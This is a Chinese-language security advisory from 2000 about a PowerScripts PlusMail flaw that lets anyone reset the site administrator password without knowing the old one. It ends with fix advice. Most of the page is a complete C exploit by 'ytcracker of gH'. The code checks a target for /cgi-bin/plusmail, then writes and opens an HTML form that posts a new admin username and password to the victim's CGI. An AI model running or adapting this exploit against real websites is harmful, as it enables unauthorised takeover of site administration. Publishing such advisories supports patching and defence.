发布日期：2000-01-17
更新日期：2000-01-17

受影响系统：

PowerScripts PlusMail

描述：

---

PowerScripts PlusMail（<http://www[dot]sammons[dot]com/plusmail.html>）是非常流行的基于CGI的管理工具。它通过图形控制界面管理WEB站点。该产品被发现存在允许攻击者在不知道当前管理员口令情况下修改管理员口令的漏洞。

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

/*

[gH-plus.c]

title: [gH plusmail vulnerability]
date: 01.20.2000
author: ytcracker of gH [phed@felons.org]
comments: plusmail is an extremely popular cgi-based administration tool
that allows you to take control of your website with a graphical control
panel interface.  the password file, however, is set with permissions rw
enabled, therefore granting the authority to change the password
whenever's clever.
the following code will detect the vulnerability and generate the required
html to exploit. shouts: seven one nine.  all of gH.  
www.mp3.com/category5. herf@ghettophreaks.org for finding vulnerability.

fix: Move/rename the PlusMail directory as a temporary fix.

*/

#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <ctype.h>
#include <fcntl.h>
#include <strings.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <signal.h>
#include <arpa/nameser.h>
#include <sys/stat.h>
#include <sys/socket.h>

int main(int argc, char *argv[])
{
int sock;
        unsigned long vulnip;

struct in_addr addr;
struct sockaddr_in sin;
struct hostent *he;
                                                                    
        char *detect;
char buffer[1024];
char plusvuln[]="GET /cgi-bin/plusmail HTTP/1.0\n\n";
char htmI[]="<html><head><title>[gH plusmail exploit]</title></head><form
action=\"http://";
char htmII[]="/cgi-bin/plusmail\" method=\"post\"><p>username: <input
type=\"text\" name=\"username\">password: <input type=\"password\"
name=\"password\">retype password: <input type=\"password\"
name=\"password1\"></p><p><input type=\"submit\" name=\"new_login\"
value=\"reset password\"></p></form><p><a
href=\"http://pure-security.net\">Pure Security
Networks</a></p></body></html>";

        FILE *html;

printf("\n [gH plusmail exploit] [ytcracker] [phed@felons.org]\n");

if(argc<2)
{
printf(" usage: %s [vulnerable website]\n\n",argv[0]);
                exit(0);
}

if ((he=gethostbyname(argv[1])) == NULL)
{
herror("gethostbyname");
exit(0);
}

vulnip=inet_addr(argv[1]);
        vulnip=ntohl(vulnip);

sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);

if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{  
perror("connect");
}

send(sock, plusvuln,strlen(plusvuln),0);
recv(sock, buffer, sizeof(buffer),0);
detect = strstr(buffer,"404");
close(sock);
    
if( detect != NULL)
        {
printf(" vulnerabilty not detected.\n");
                exit(0);
        }
else
printf(" vulnerability detected.  generating html...\n");

html=fopen("plus.html","w+b");
fprintf(html,"%s",htmI);
fprintf(html,"%s",argv[1]);
fprintf(html,"%s",htmII);
        fclose(html);

printf(" spawning lynx...\n");

        system("lynx plus.html");
return 0;
}

建议：

---

1、移动/重命名PlusMail目录。
    2、为该目录增加口令保护。

浏览次数：7122
严重程度：0（网友投票）